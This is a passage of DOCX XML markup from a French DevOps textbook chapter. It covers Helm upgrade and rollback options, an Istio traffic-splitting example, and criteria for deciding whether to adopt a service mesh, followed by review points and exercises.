        <w:t xml:space="preserve">  --atomic --timeout 5m</w:t>
        <w:br/>
        <w:br/>
        <w:t># Observer et revenir</w:t>
        <w:br/>
        <w:t>helm list -n production</w:t>
        <w:br/>
        <w:t>helm history api -n production</w:t>
        <w:br/>
        <w:t>helm rollback api 3 -n production</w:t>
        <w:br/>
        <w:t>helm uninstall api -n production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.254 — Cinq options de mise à jour</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91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Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>--atomic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Annule en cas d'échec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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--timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Délai maximal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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Toujours préciser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>--wait</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attend que tout soit prêt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>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Avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>--atomic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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--dry-run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Simule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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Avant une mise à jour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>--reuse-values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conserve les valeurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attention aux dérives</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications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Vérifier l'écart entre l'état installé et le chart</w:t>
        <w:br/>
        <w:t>helm diff upgrade api ./mon-service -n production -f values.production.yaml</w:t>
        <w:br/>
        <w:br/>
        <w:t># Inspecter les valeurs réellement appliquées</w:t>
        <w:br/>
        <w:t>helm get values api -n production -a</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RELEASE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Instance nommée d'un chart installée dans un namespace. Deux releases du même chart peuvent coexister avec des valeurs différentes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>69.4 Service mesh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un service mesh ajoute un proxy à côté de chaque pod. Il décharge l'application de la gestion du trafic, du chiffrement entre services et de la traçabilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="80" name="Picture 80"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f78.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId116"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.78 — Un maillage de services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.255 — Cinq fonctions et leur coût</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Fonction</w:t>
            </w:r>
          </w:p>
        </w:tc>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Sans mesh</w:t>
            </w:r>
          </w:p>
        </w:tc>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Avec mesh</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chiffrement inter-services</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Par application</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Automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Réessais et délais</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Dans le code</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Déclaratif</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trafic progressif</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Manuel ou ingress</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Piloté par politique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Traçabilité</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Instrumentation</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Intégrée</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Coût</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Aucun</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Latence, mémoire, complexité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une répartition 90/10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Exemple Istio : répartition du trafic entre versions</w:t>
        <w:br/>
        <w:t>apiVersion: networking.istio.io/v1</w:t>
        <w:br/>
        <w:t>kind: VirtualService</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: api</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  hosts: ["api"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - route:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - destination:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            host: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">            subset: v1</w:t>
        <w:br/>
        <w:t xml:space="preserve">          weight: 90</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - destination:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            host: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">            subset: v2</w:t>
        <w:br/>
        <w:t xml:space="preserve">          weight: 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois vérifications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Vérifier le maillage d'un pod</w:t>
        <w:br/>
        <w:t>kubectl get pod api-xxxx -o jsonpath='{.spec.containers[*].name}'</w:t>
        <w:br/>
        <w:t># api  istio-proxy</w:t>
        <w:br/>
        <w:br/>
        <w:t># Métriques et configuration</w:t>
        <w:br/>
        <w:t>istioctl analyze -n production</w:t>
        <w:br/>
        <w:t>istioctl proxy-status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>69.5 Faut-il un mesh ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un service mesh résout des problèmes réels, mais il ajoute un composant critique à exploiter. Trois questions permettent de décider.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.256 — Quatre questions de décision</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444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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4440"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Plus de dix services avec du trafic croisé ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Envisageable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Inutile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4440"/>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Besoin de chiffrement inter-services ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Argument fort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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TLS d'ingress suffit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4440"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Équipe capable d'exploiter un control plane ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Envisageable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>À reporter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4440"/>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Besoin de tests de panne et de trafic progressif ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Argument fort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Ingress suffit</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COMMENCER SANS MESH</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un ingress, des sondes, des journaux structurés et des métriques couvrent l'essentiel des besoins d'une équipe de taille moyenne. Le mesh s'ajoute quand le problème est identifié, pas avant.</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PROXY LATÉRAL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Conteneur ajouté automatiquement dans chaque pod, qui intercepte le trafic réseau. Il applique la politique du plan de contrôle sans modifier le code applicatif.</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ADOPTER HELM PROGRESSIVEMENT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 chart par application, pas un chart par équipe.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Valeurs par environnement séparées et versionnées.</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helm lint</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>helm template</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> dans la CI.</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--atomic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> en production.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 retour arrière testé avant d'en avoir besoin.</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Helm regroupe des objets Kubernetes en un paquet paramétrable.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chart expose peu de valeurs, avec des défauts sûrs.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helpers évitent la duplication dans les templates.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release est une instance nommée d'un chart.</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--atomic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annule une mise à jour échouée.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service mesh automatise chiffrement, routage et traçabilité.</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Il ajoute un composant critique et de la latence.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mesh s'adopte quand le problème est identifié.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cluster est outillé. La partie suivante traite du cloud, du provisionnement et de la configuration.</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69.1 — Écrire un chart minimal</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Le service doit être déployable avec trois valeurs.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 xml:space="preserve">Créez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Chart.yaml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>values.yaml</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Écrivez le déploiement et le service.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le rendu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 69.2 — Revenir à une version précédente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Une mise à jour a introduit une régression.</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Identifiez la révision.</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Revenez en arrière.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l'état.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 69.3 — Décider d'un service mesh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une équipe de six personnes exploite huit services.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Listez les besoins réels.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Estimez le coût.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Proposez une décision argumentée.</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69.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
